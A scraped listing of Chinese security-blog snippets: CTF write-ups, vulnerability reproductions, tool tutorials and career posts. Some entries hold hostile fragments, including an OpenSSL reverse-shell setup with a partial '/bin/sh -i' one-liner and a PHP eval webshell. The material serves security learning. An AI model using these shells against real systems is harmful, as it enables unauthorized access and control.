题目点进题目，页面只显示/?ip，没有其他信息联系到题目名为ping，猜测题目于ping地址有关，先尝试一下构造payload http://31e941af-c0d7-49c9-a3fe-84cb13d8adae.node4.buuoj.cn:81/?ip127.0.0.1 这里猜测可能为远程命令执行…

【漏洞复现】企望制造 ERP命令执行

漏洞描述由于企望制造 ERP comboxstore.action接口权限设置不当，默认的配置可执行任意SQL语句，利用xp_cmdshell函数可远程执行命令，未经认证的攻击者可通过该漏洞获取服务器权限。免责声明技术文章仅供参考，任何个人和组织…

SIEM：网络攻击检测

如果您正在寻找一种能够检测环境中的网络威胁、发送实时警报并自动执行事件响应的网络攻击检测平台，Log360 SIEM解决方案可以完成所有这些以及更多，能够准确检测安全威胁并遏制网络攻击。网络攻击检测能力基于规则的攻击检测MITRE ATT&CK 实现来…

web：[极客大挑战 2019]Havefun

题目点进页面，页面显示是一只猫，没有其他的提示信息查看网页源代码，划到最后这段php代码包含了通过get方式的提交信息构造payload： http://aaf4c4b5-7bf2-404f-8bf5-f6e97d830b72.node4.buuoj.cn:81/?catdog 即得到flag f…

Serv-U FTP服务器结合cpolar内网穿透实现共享文件并且外网可远程访问——“cpolar内网穿透”

文章目录 1. 前言2. 本地FTP搭建2.1 Serv-U下载和安装2.2 Serv-U共享网页测试2.3 Cpolar下载和安装 3. 本地FTP发布3.1 Cpolar云端设置3.2 Cpolar本地设置 4. 公网访问测试5. 结语 1. 前言科技日益发展的今天，移动电子设备似乎成了我们生活的主角，智能…

网络安全--防火墙

一、防火墙二、防火墙实验拓扑图第一步、准备条件 1、云的设置单击云设备，先选择UDP，再增加，增加之后就会记录在下面。再增加一个虚拟的网卡，选择一个电脑中的虚拟网卡，然后增加。先选择对应端口，…

BurpSuite工具详解及暴库示例

一.Burp Suite工具安装及配置 1.Burp Suite Burp Suite是用于Web应用安全测试、攻击Web应用程序的集成平台，它将各种安全工具无缝地融合在一起，以支持整个测试过程中，从最初的映射和应用程序的攻击面分析，到发现和利用安全漏洞…

攻防世界-simple_php

原题解题思路 flag被分成了两个部分：flag2，flag2。获得flag1需要满足变量a0且变量a≠0，这看起来不能实现，但实际上当变量a的值是字符时，与数字比较会发生强制类型转换，所以a为字符型数据即可，变…

网络安全（黑客）快速入门~

网络安全的学习需要遵守循序渐进，由浅入深。通常网络安全学习方法有两种： 方法1：先学习编程，然后学习Web渗透及工具使用等； 适用人群：有一定的代码基础的小伙伴基础部分基础部分需要学习以下内容&am…

信息安全三级概述

Apereo CAS反序列化漏洞中数据加解密研究

Apereo CAS反序列化漏洞中数据加解密研究 0x01、简介0x02、网上获取资料0x03、初步运行失败1、分析：2、Tips： 0x04、分析原因1、自己写解密算法 / 直接使用cas工程的相关jar包、java文件，调用解密函数2、为什么会解密失败？ 0x05、…

Typora远程代码执行漏洞CVE-2023-2317

0x00 前言漏洞详情版本16.7以前的Typora中的updater/update.html存在基于DOM的XSS，可以通过加载定制的markdown文件实现任意javascript代码执行。原理分析漏洞触发点位于Typora的updater.html文件，通过特定协议typora://即可访问，同时…

某微e-office协同管理系统存在任意文件读取漏洞分析 CNVD-2022-07603

目录 1.漏洞概述 2.漏洞分析 3.Nuclei自动化扫描POC 4.修复方式 1.漏洞概述泛微e-office是一款由泛微网络科技股份有限公司开发的办公自动化（Office Automation，简称OA）系统。它是一种基于Web的协同办公平台，可以帮助企业实现电子化、自动化、智能化的办公环境。泛微…

5个适合初学者的初级网络安全工作,网络安全就业必看

前言网络安全涉及保护计算机系统、网络和数据免受未经授权的访问、破坏和盗窃 - 防止数字活动和数据访问的中断 - 同时也保护用户的资产和隐私。鉴于公共事业、医疗保健、金融以及联邦政府等行业的网络犯罪攻击不断升级，对网络专业人员的需求很高，这并…

Pikachu XSS(跨站脚本攻击)

文章目录 Cross-Site ScriptingXSS（跨站脚本）概述反射型[xss](https://so.csdn.net/so/search?qxss&spm1001.2101.3001.7020)(get)反射型xss(post)存储型xssDOM型xssDOM型xss-xxss-盲打xss-过滤xss之htmlspecialcharsxss之href输出xss之js输出 Cros…

Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839复现)

内容目录 Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)weblogic中间件CVE-2018-2628漏洞描述影响版本漏洞复现修复方案 CVE-2023-21839漏洞描述影响版本漏洞复现修复方案 Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839) weblogic中间件 WebLogic是美国Oracle公司…

网安之PHP基础作业(5)

目录目录前言系列文章列表 IJ中PHP环境的搭建和使用教程思维导图 1，简答题 1.1.题目部分 1.2,题目分析 2，页面一实现 2.1,题解 2.2,页面效果展示 3，页面二的实现 3.1,题解 3.2,题目结果展示 3.2.1,结果1 3.2.2,结果2 3…

fofa搜索使用

fofa搜索使用文章目录 fofa搜索使用网站fofa搜索语法多条件查询网站fofa https://fofa.info/搜索语法 1.title”beijing”从标题中搜索“北京2.headerQ"thinkphp”从http响应头中搜索“thinkphp3.body”管理后台”从html正文中搜索“管理后台4.domain”163.com”从子域…

组件安全概述

文章目录一、组件安全概述1.1 常见组件1.1.1 操作系统1.1.2 Web容器1.1.3 中间件1.1.4 数据库1.1.5 开发框架1.1.6 OA系统1.1.7 其他组件 1.2 漏洞复现1.2.1 漏洞复现模板1.2.2 漏洞名称参考1.2.3 漏洞库二、 Apache2.1 Apache HTTPD2.2 Apache Shiro2.3 Apache Tomcat 三、…

操作系统权限提升(二十七)之数据库提权-MySQL MOF提权

MySQL MOF提权 MOF介绍 mof是windows系统的一个“托管对象格式”文件（位置：C:/windows/system32/wbem/mof/），其作用是每隔五秒就会去监控进程创建和死亡，mof目录下有两个文件夹（good与bad）。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件，执行成功会…

JWT安全及案例实战

文章目录 JWT 安全1. Cookie2. Session3. Token4. JWT4.1 JWT概述4.1.1 JWT头4.1.2 有效载荷4.1.3 签名哈希4.1.4 通信流程 4.2 JWT 漏洞描述4.3 JWT 漏洞原理4.4 JWT 安全防御 5. WebGoat 靶场实验5.1 第四关5.2 第五关5.3 第七关越权与逻辑漏洞 Web漏洞点只有一个入口&#…

JWT 安全及案例实战

文章目录一、JWT (json web token)安全1. Cookie（放在浏览器）2. Session（放在服务器）3. Token4. JWT (json web token)4.1 头部4.1.1 alg4.1.2 typ 4.2 payload4.3 签名4.4 通信流程 5. 防御措施二、漏洞实例（webgoa…

防火墙基础之H3C防火墙分支与分支之间双向地址转换

分支与分支之间双向地址转换原理概述： 防火墙（英语：Firewall）技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备，帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障，以保护用户资…

防火墙基础之H3C防火墙和三层交换机链路聚合的配置

H3C防火墙和三层交换机链路聚合的配置原理概述： 防火墙（英语：Firewall）技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备，帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障，以保…

【网络安全-sql注入（5）】sqlmap以及几款自动化sql注入工具的详细使用过程

一，sqlmap 工具的详细使用 kali系统自带这个工具，无需安装直接sqlmap 后面接参数使用 Windows上参照以下方法安装即可 1-1 工具下载 1-1-1 sqlmap下载 sqlmap 工具下载地址： GitHub - sqlmapproject/sqlmap: Automatic SQL injection a…

【网络安全---ICMP报文分析】Wireshark教程----Wireshark 分析ICMP报文数据试验

一，试验环境搭建 1-1 试验环境示例图 1-2 环境准备两台kali主机（虚拟机） kali2022 192.168.220.129/24 kali2022 192.168.220.3/27 1-2-1 网关配置： 编辑-------- 虚拟网路编辑器更改设置进来以后 ，先选择N…

【网络安全-信息收集】网络安全之信息收集和信息收集工具讲解

一，域名信息收集 1-1 域名信息查询可以用一些在线网站进行收集，比如站长之家域名Whois查询 - 站长之家站长之家-站长工具提供whois查询工具，汉化版的域名whois查询工具。https://whois.chinaz.com/ 可以查看一下有没有有用的信息&#xf…

【网络安全---XSS漏洞（1）】XSS漏洞原理，产生原因，以及XSS漏洞的分类。附带案例和payload让你快速学习XSS漏洞

一，什么是XSS漏洞？ XSS全称（Cross Site Scripting）跨站脚本攻击，为了避免和CSS层叠样式表名称冲突，所以改为了XSS，是最常见的Web应用程序安全漏洞之一，位于OWASP top 10 2013/2017年…

【软考】5.1 七层模型/局域网/TCP-IP协议

《网络功能和分类》即计算机技术与通信技术相结合的产物，实现了远程通信、远程信息处理和资源共享计算机网络的功能：数据通信、资源共享、负载均衡（给多个服务器负担）、高可靠性分布范围拓扑结构分类总线型：一般局…

一文讲清楚网络安全是什么？网络安全工程师需要学什么？就业前景如何？

前言什么是网络安全？ 网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，网络服务不中断。网络安全是指通过各种技术、措施和行为来保…

练[MRCTF2020]套娃

[MRCTF2020]套娃文章目录 [MRCTF2020]套娃掌握知识解题思路代码分析1代码分析2 关键paylaod 掌握知识参数的_符号的替换，正则和强等于联合绕过，jsfuck编码，bp请求方式的转变，本地ip的请求头，代码审计&#xff0c…

练[FBCTF2019]RCEService

[FBCTF2019]RCEService 文章目录 [FBCTF2019]RCEService掌握知识解题思路关键paylaod 掌握知识 json字符串格式，命令失效(修改环境变量)–绝对路径使用linux命令，%0a绕过preg_match函数，代码审计解题思路打开题目链接，发现…

漏洞复现--泛微E-Office前台文件读取漏洞

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

DVWA -xss

什么是XSS 跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击，攻击者可以在合法网站或Web应用程序中执行恶意脚本。当wb应用程序在其生成的输出中使用未经验证或未编码的用户输入时，就会发生XSS。跨站脚本攻击，XSS(Cross Site S…

DVWA-内容安全策略绕过

内容安全策略绕过内容安全策略（Content Security Policy，简称CSP）是一种以可信白名单作机制，来限制网站是否可以包含某些来源内容，缓解广泛的内容注入漏洞，是一种用于增强网页的安全性的安全策略机制。…

vulnhub_Empire_LupinOne靶机渗透测试

Empire_LupinOne靶机靶机地址：Empire: LupinOne ~ VulnHub 文章目录 Empire_LupinOne靶机信息收集web渗透获取权限横向移动权限提升靶机总结信息收集通过nmap扫描得到靶机开放22和80端口，进行全扫描得到了一些服务版本信息等，web端有ro…

一次端口映射练习

模拟内网环境的映射练习需要的主机： 目的：Win10作为代理实现从kali（外网）到winser的web页面访问制作木马运行上传到windowserver的木马

小白自学笔记—网络安全（黑客笔记）

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟入…

【C语言】Linux平台下解析pcap文件

开发环境是readhat、ubuntu、kali 在wireshark上抓包需要使用 Wireshark/tcpdump/ 且文件后缀名为.pcap 方式保存效果如下： 引入俩文件如下。 my_pcap.h #pragma once #include <netinet/in.h>#define PCAP_MAGIC 0xa1b2c3d4typedef struct pcap_file_he…

小白自学—网络安全（黑客技术）笔记

目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、网络安全学习路线四、学习资料的推荐想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类…

如何为金蝶ERP软件配置自定义域名，并实现公网访问——“cpolar内网穿透”

文章目录前言1. 保留自定义域名2. 域名解析3. 配置自定义域名4. 关于服务器选择以及域名备案的说明4.1 关于服务器地区的选择：4.2 关于自定义域名备案：4.3 关于域名过白名单： 前言上篇文章我们讲过如何安装金蝶云星空，实现异地…

Cuckoo沙箱各Ubuntu版本安装及使用

1.沙箱简介 1.1 沙箱沙箱是一个虚拟系统程序，允许你在沙箱环境中运行浏览器或其他程序，因此运行所产生的变化可以随后删除。它创造了一个类似沙盒的独立作业环境，在其内部运行的程序并不能对硬盘产生永久性的影响。在网络安全中&#xff…

Vulnhub-DC-6 靶机复现完整过程

记录Vulnhub-DC-6 靶机复现完整过程一、搭建环境 kali充当攻击机 ip地址是：192.168.200.14 DC-6充当靶机 ： IP地址暂时未知注意：让两台机器的使用同一种网络适配器二、信息收集 1.探索同网段存活的主机、 ①第一种方法 arp-scan -l…

U盘数据防泄密软件（U盘防泄密加密软件都有哪些？）

随着科技的发展，U盘已经成为了我们日常生活中不可或缺的一部分。然而，U盘的便捷性也带来了安全隐患。为了保护您的数据安全，U盘防泄密加密系统应运而生。本文将从三个方面为您介绍U盘防泄密加密系统是什么、有哪些以及能做什么。一、U盘防泄…

【漏洞复现】天OA存在任意文件上传漏洞

漏洞描述华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成…

渗透测试——信息收集思路

文章目录信息收集域名与 IPOSINTCDNCDN的作用如何检测是否存在CDN CDN 绕过多地Ping邮件服务器子域名真实IP寻找国外地址请求查找老域名查找关联域名信息泄露/配置文件网站漏洞DNS记录，证书域名历史搜索引擎语法WHOIS端口对外开放情况Nmap 网站的三种部署模式网站…

Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)

Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773) 文章目录 Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)1 在线漏洞解读:2 环境搭建3 影响版本：4 漏洞复现4.1 执行漏洞核心指令4.2 进行访问使用bp抓包4.3 尝试执行指令4.4 反弹shenll成功 1 …

Tomcat Takeover

靶场介绍蓝队靶场练习之Tomcat Takeover 场景介绍我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况，该团队捕获了网络流量进行分析。此pcap文件可能包含一系列恶意活动，这些活动已导致Apache Tomcat Web服务器…

【漏洞复现】Tenda路由器存在密码泄露

漏洞描述腾达W15E路由器外置4根增强型360全向天线，苛刻调校到0.01毫米级的零干扰间距，科学独立布局的信号放大器PA，穿墙性能更强劲，覆盖范围更广，在哪都有好信号。该型号的路由器系统存在密码泄露漏洞，…

【漏洞复现】EnjoySCM存在文件上传漏洞

漏洞描述 EnjoySCM是一款适应于零售企业的供应链管理软件，主要为零售企业的供应商提供服务。EnjoySCM的目的是通过信息技术，实现供应商和零售企业的快速、高效、准确的信息沟通、管理信息交流。。该系统存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器的敏感信息。 …

VMware的三种连接模式

目录目录前言系列文章列表思维导图 1，VMware是什么? 2，VMware的连接模式 2.1,VMware的连接模式是什么? 2.2, VMware的连接模式的分类 3，桥接模式 3.1,图示介绍 3.2,详细介绍 3.3,注意点 4.NAT模式 4.1,NAT协议 4.2,图示…

网络安全（黑客技术）—小白自学笔记

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟入…

漏洞复现--时空智友企业流程化管控系统敏感信息泄露（POC）

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

CamoDroid 与 Frida Android动态分析工具搭建流程（linux）

CamoDroid 与 Frida Android动态分析工具搭建流程（linux） 写在前面这个东西配置起来比较复杂，其实最主要就是配置frida，如果你之前就使用过frida框架的话问题就不是很大介绍camodroid CamoDroid 是一个开源和开放架构的 And…

Solidity 小白教程：13. 继承

Solidity 小白教程：13. 继承这一讲，我们介绍solidity中的继承（inheritance），包括简单继承，多重继承，以及修饰器（modifier）和构造函数（constructor&#xff…

fastjson远程命令执行

fastjson远程代码执行漏洞原因：fastjson在对json字符串反序列化的时候，会读取到type的内容，将json内容反序列化为java对象并调用这个类的setter方法。 1、搭建rmi服务直接利用jndi-exploit工具 2、抓包改为POST。开启nc监听、发包 PO…

web：[极客大挑战 2019]Upload

题目页面显示为一个上传，猜测上传一句话木马文件先查看源代码看一下有没有有用的信息，说明要先上传图片，先尝试上传含有一句话木马的图片构造payload <?php eval($_POST[123]);?> 上传后页面显示为，不能包含<&…

ARP欺骗攻击实操

目录目录前言系列文章列表全文导图 1，ARP概述 1.1,ARP是什么？ 1.2,ARP协议的基本功能 1.3,ARP缓存表 1.4,ARP常用命令 2，ARP欺骗 2.1,ARP欺骗的概述? 2.2,ARP欺骗的攻击手法 3，ARP攻击 3.1,攻击前的准备 3.2,…

NSS [NISACTF 2022]middlerce

NSS [NISACTF 2022]middlerce 开题，直接给了源码。由语句$command json_decode($txw4ever,true)[cmd];可得，$txw4ever一定是json格式的数据，但是，preg_match()函数却过滤了{，同时.*贪婪匹配后又匹配括号里的字符&am…

悬崖边：企业如何应对网络安全漏洞趋势

在本文中，我们将讨论企业在处理漏洞时面临的挑战，解释安全漏洞是如何引发网络攻击的，以及为什么它会导致不可接受的事件。我们还将分享我们在识别趋势性漏洞方面的经验。现代信息安全方法正在成为企业的工作流程。例如，不久前&a…

Nmap安装和使用详解

Nmap安装和使用详解 Nmap概述功能概述运行方式 Nmap安装官方文档参考：Nmap参数详解目标说明主机发现端口扫描Nmap将目标主机端口分成6种状态：Nmap产生结果是基于机器的响应报文，而这些主机可能是不可信任的，会产生一些迷惑或者误导…

计算机等级考试—信息安全三级真题二

目录一、单选题二、填空题三、综合题一、单选题

Pichome欧奥图文档系统代码审计—路由分析

目录 1.前言 1.1 环境搭建 2.路由分析 2.1 路由定义文件 2.2 路由调用 2.3 admin.php 2.4 user.php

2023蓝帽杯半决赛电子取证+CTF部分题解

怎样防止员工泄露技术？（十条避免公司泄密的措施）

在当今信息化社会，公司信息的安全性和保密性显得尤为重要。一旦公司信息泄露，不仅会对公司的经营造成严重影响，还可能引发法律纠纷。因此，采取有效的措施来防止公司信息泄露是非常必要的。以下是一些具体的措施： 部署洞…

如何在企业网站里做好网络安全

在当今数字时代，网站不仅仅是企业宣传和产品展示的平台，更是日常生活和商业活动中不可或缺的一部分。然而，随着网络技术不断发展，网站的安全问题日益凸显。保护网站和用户数据的安全已经成为至关重要的任务，以下是一些…

透视俄乌网络战之四：西方科技巨头的力量

透视俄乌网络战之一：数据擦除软件透视俄乌网络战之二：Conti勒索软件集团（上） 透视俄乌网络战之三：Conti勒索软件集团（下） 西方科技巨头的力量 1. Palantir2. SpaceX3. Maxar Technologies4. Cl…

web：[护网杯 2018]easy_tornado

题目点进页面显示如下点进去查看有个render，结合题目名，可能是ssti 同时注意到url，无论点进哪个文件，url的格式都为file?filename/xxx&filehashxxx 所以结合hints.txt中的提示，filehash就是md5加密得到的&…

vulnhub_clover靶机渗透测试

clover靶机文章目录 clover靶机信息收集ftp渗透web渗透横线移动权限提升靶机总结靶机地址：https://www.vulnhub.com/entry/clover-1,687/ 信息收集使用nmap扫描得到了很对端口，能用的也就是21 22 80三个端口，其他都是关闭的，全…

网络安全（自学黑客技术）——黑客学习方法

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

带宽和上传下载速度关系

**带宽（bandwidth）**又叫频宽，是指在固定的的时间可传输的资料数量，亦即在传输管道中可以传递数据的能力。在数字设备中，频宽通常以bps表示，即每秒可传输之位数。在模拟设备中，频宽通常以每秒传…

内网渗透——黄金票据与白银票据

文章目录黄金票据与白银票据1. 背景2. 具体实现2.1 Kerberos协议认证流程 3. 黄金票据3.1 条件3.2 适用场景3.3 利用方式 4. 白银票据4.1 条件4.2 适用场景4.3 利用方式 5. 金票和银票的区别5.1 获取的权限不同5.2 认证流程不同5.3 加密方式不同 6. 经典面试题6.1 什么是黄金票…

网络安全（黑客）—小白自学

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

网络安全（黑客技术）——自学思路

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

HTTP/2 中的漏洞

另一个热门漏洞是 CVE-2023-44487。该漏洞与 HTTP/2 协议实施中的一个缺陷有关，可用于实施 DDoS 攻击。使用该漏洞的攻击被命名为 HTTP/2 快速重置。为什么它很危险要利用该漏洞，攻击者需要在 HTTP/2 会话中打开大量请求，然后在不等待服…

【网安专题10.11】软件安全+安全代码大模型

软件安全安全代码大模型写在最前面一些启发科研方法科研思路课程考察要求软件供应链安全漏洞复制1、代码克隆2、组件依赖分析关键组件安全不足，漏洞指数级放大供应链投毒内部攻击源代码攻击分发、下载网站攻击更新、补丁网站攻击形成技术壁垒（找方向…

Xshell7和Xftp7超详细下载教程（包括安装及连接服务器附安装包）

1.下载 1.官网地址： XSHELL - NetSarang Website 选择学校免费版下载 2.将XSHELL和XFTP全都下载下来 2.安装安装过程就是选择默认选项，然后无脑下一步 3.连接服务器 1.打开Xshell7，然后新建会话 2.填写相关信息出现Connection establi…

虹科方案 | 车载以太网转换器交换机解决方案

全文导读：虹科推出的基于转换器&交换机的车载以太网解决方案，旨在满足汽车领域对高速、可靠、安全的数据传输和系统集成的需求，并且具有高稳定性，在转换过程中不修改任何数据包，有效应用于传感器数据采集、台架测试…

一图看懂CodeArts Governance 三大特性，带你玩转开源治理服务

华为云开源治理服务CodeArts Governance是针对软件研发提供的一站式开源软件治理服务，凝聚华为在开源治理上的优秀实践经验，提供开源软件元数据及软件成分分析、恶意代码检测等能力，从合法合规、网络安全、供应安全等维度消减开源软件使用风险…

警惕这款记录音频和电话的Android木马软件SpyNote

导语：近日，一款名为SpyNote的Android木马软件被揭示出其多样化的信息收集功能。该木马软件通常通过短信钓鱼攻击传播，攻击链通过欺骗潜在受害者点击嵌入链接来安装该应用程序。除了要求入侵性权限以访问通话记录、摄像头、短信和外部存储等&a…

PHP遇见错误了看不懂？这些错误提示你必须搞懂

🎬 鸽芷咕：个人主页 🔥 个人专栏:《速学数据结构》《C语言进阶篇》 ⛺️生活的理想，就是为了理想的生活! 文章目录一、错误分类二、系统错误：2.1 编译错误2.2 致命错误2.3 警告错误2.4 通知错误三、用户错误3.1 错…

数据库安全-RedisHadoopMysql未授权访问RCE

目录数据库安全-&Redis&Hadoop&Mysql&未授权访问&RCE定义漏洞复现Mysql-CVE-2012-2122 漏洞Hadoop-配置不当未授权三重奏&RCE 漏洞 Redis-未授权访问-Webshell&任务&密匙&RCE 等漏洞定义：漏洞成因漏洞危害漏洞复现Redis-未授权…

Vulnhub系列靶机-Raven2

文章目录 Raven2 渗透测试1. 信息收集1.1 主机探测1.2 端口扫描1.3 目录爆破 2. 漏洞探测3. 漏洞利用3.1 msfconsole3.2 交互式shell 4. 权限提升 Raven2 渗透测试 1. 信息收集 1.1 主机探测 arp-scan -l1.2 端口扫描 nmap -p- -A 192.168.188.213通过nmap工具进行端口扫描…

动态代理原理和设计模式详解

一、什么是代理模式代理模式是一种设计模式，提供了对目标对象额外的访问方式，即可以通过代理访问目标对象，这样可以在不修改原目标对象的前提下，提供额外的方式进行访问，扩展目标对象的功能。通俗的说，例…

网络工程师知识点2

21、VLAN 有什么作用？ ①广播控制；②安全性；③增加带宽利用率；④减少延迟。 22、实际的项目中如何划分vlan的？ 采用静态VLAN的划分方式，可以按照楼层划分，可以按安装科室划分 23、vlan 的链路…

python编写修改sqlmap进行_WAF绕过

WAF绕过文章目录 WAF绕过1 waf机制了解1.1 waf防火墙识别工具1.2 WAF机制及绕过方法总结: [绕waf参考总结地址](https://www.freebuf.com/articles/web/229982.html)1.3 绕过waf（安全狗）方式 2 绕过分析 -替换格式3 编写py脚本绕过安全狗3.1启动编好的脚…

【sql注入】如何通过SQL注入getshell？如何通过SQL注入读取文件或者数据库数据？一篇文章告诉你过程和原理。sql注入【二】

前言本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件，读取文件。通过SQL输入来注入木马来getshell等，讲解了比较详细的过程； 如果想要学习SQL注入原理以及如何进行SQL注入，我也写了一篇详细的SQL注入方法及…

DarkGate恶意软件通过消息服务传播

导语近日，一种名为DarkGate的恶意软件通过消息服务平台如Skype和Microsoft Teams进行传播。它冒充PDF文件，利用用户的好奇心诱使其打开，进而下载并执行恶意代码。这种攻击手段使用了Visual Basic for Applications（VBA&#xff0…

克服网络安全压力：如何掌控无限的云数据

管理云中的数字风险比以往任何时候都更加重要。数字化转型引发的云数据呈指数级增长，为安全分析师创造了一个更大的威胁环境。随着威胁行为者继续危害组织最敏感的数据，这一挑战将会加剧。预计未来五年全球网络犯罪成本将激增，从 2022 年的…

【网络安全-sqlmap】sqlmap以及几款自动化sql注入工具的详细使用过程，超详细，SQL注入【5】

一，sqlmap 工具的详细使用 kali系统自带这个工具，无需安装直接sqlmap 后面接参数使用 Windows上参照以下方法安装即可 1-1 工具下载 1-1-1 sqlmap下载 sqlmap 工具下载地址： GitHub - sqlmapproject/sqlmap: Automatic SQL injection a…

趋势列表上又多了两个漏洞！

CVE-2023-24955 和 CVE-2023-29360 来自微软产品 5 月和 6 月的安全补丁报告。它们之所以特别危险，是因为出现了公开漏洞利用。以下是详细信息。第一个漏洞 CVE-2023-24955存在于 Microsoft SharePoint Server 中。它可导致远程代码执行。它与覆盖随后由服务器执…

Ctfshow web入门 phpCVE篇 web311-web315 详细题解全

CTFshow phpCVE web311 CVE-2019-11043 PHP远程代码执行漏洞复现（CVE-2019-11043）【反弹shell成功】-腾讯云开发者社区-腾讯云 (tencent.com) 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞，使用某些特定配置的 Nginx PHP-FPM 的服务…

深信服应用交付 AD 存在远程命令执行漏洞附POC

文章目录深信服应用交付 AD 存在远程命令执行漏洞附POC1. 深信服应用交付 AD 简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾深信服应用交付 AD 存在远程命令执行漏洞附POC 免责声明：请勿利用文章内的相关技术从事非法测…

【pwn入门】用gdb调试32位程序

声明本文是B站你想有多PWN学习的笔记，包含一些视频外的扩展知识。问题源码 #include <stdio.h> #include <stdlib.h> #include <unistd.h> char sh[]"/bin/sh"; int func(char *cmd){system(cmd);return 0; }int main(){char a[8]…

揭开黑客的神秘面纱：黑客文化、技术手段与防御策略

目录 1. 引言1.1 黑客的定义与起源1.2 黑客文化的形成与传承 2. 黑客的分类与目标2.1 道德黑客与恶意黑客2.2 黑客攻击的目标与动机解析 3. 黑客的技术手段3.1 网络入侵与渗透测试3.2 社会工程学与钓鱼攻击3.3 恶意软件与病毒传播3.4 数据泄露与身份盗窃 4. 防御黑客攻击的策略…

练[极客大挑战 2019]BuyFlag

[极客大挑战 2019]BuyFlag 文章目录 [极客大挑战 2019]BuyFlag掌握知识解题思路关键paylaod 掌握知识 cookie字段的修改，代码审计，数字和字符串弱等于绕过，科学计数法替换长数字，GET请求包转换POST请求包解题思路打开题目…

buuctf[极客大挑战 2019]Havefun 1

网页环境title标题每一帧都不要放过，或许那个不起眼的地方就存在重要信息到这并未发现什么重要信息，F12看看在源代码底部发现PHP代码：  PHP代码…

Vulnhub系列靶机-The Planets Earth

文章目录 Vulnhub系列靶机-The Planets: Earth1. 信息收集1.1 主机扫描1.2 端口扫描1.3 目录爆破 2. 漏洞探测2.1 XOR解密2.2 解码 3. 漏洞利用3.1 反弹Shell 4. 权限提升4.1 NC文件传输 Netcat（nc）文件传输 Vulnhub系列靶机-The Planets: Earth 1. 信息…

Apache Shiro 漏洞复现

文章目录 Apache Shiro 漏洞复现1. Apache Shiro 1.2.4 反序列化漏洞1.1 漏洞描述1.2 漏洞原理1.3 漏洞复现1.3.1 环境启动 1.4 漏洞利用1.5 修复方案 Apache Shiro 漏洞复现链接地址：Vulhub - Docker-Compose file for vulnerability environment 1. Apache Shi…

BUUCTF Java逆向解密 1

Class文件是Java编译后的二进制字节码文件。我这里使用的是jadx-gui，直接将class文件拖进去即可 package defpackage;import java.util.ArrayList; import java.util.Scanner;/* renamed from: Reverse reason: default package */ /* loaded from: Reverse.clas…

关于信息安全软考的记录5

1、防火墙的概念为了应对网络威胁，联网的机构或公司将自己的网络与公共的不可信任的网络进行隔离。网络的安全信息程度和需要保护的对象，人为地划分若干安全区域，这些安全区域有： 公共外部网络，如Intrenet内联网&…

【保姆级】网络安全工程师学习成长路线，就业前景，薪资待遇分享

前言最近总能在网上看到很多诸如：“怎样成为网络信息安全工程师”等相关问题，这可能与近几年网络安全事件频发，国家对于互联网信息安全和互联网舆情的重视程度不断提升有关，似乎网络信息安全工程师随之成为炙手可热的职业。待…

使用OpenSSL的反弹shell

1、攻击机生成证书： openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes2、攻击机开启服务 openssl s_server -quiet -key key.pem -cert cert.pem -port 803、靶机连接命令 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1…

$2023 柏鹭杯 --- Crypto fractrsa wp$

2023 柏鹭杯 --- Crypto fractrsa wp

文章目录题目解题过程题目 #python3 import sys sys.path.append("..") from Crypto.Util.number import * from random import * from sage.all import * from secret import flag1 as flagnum1 3 num2 5 while(num1<num2):num1 getPrime(512)num2 get…

小白自学笔记—网络安全（黑客技术）

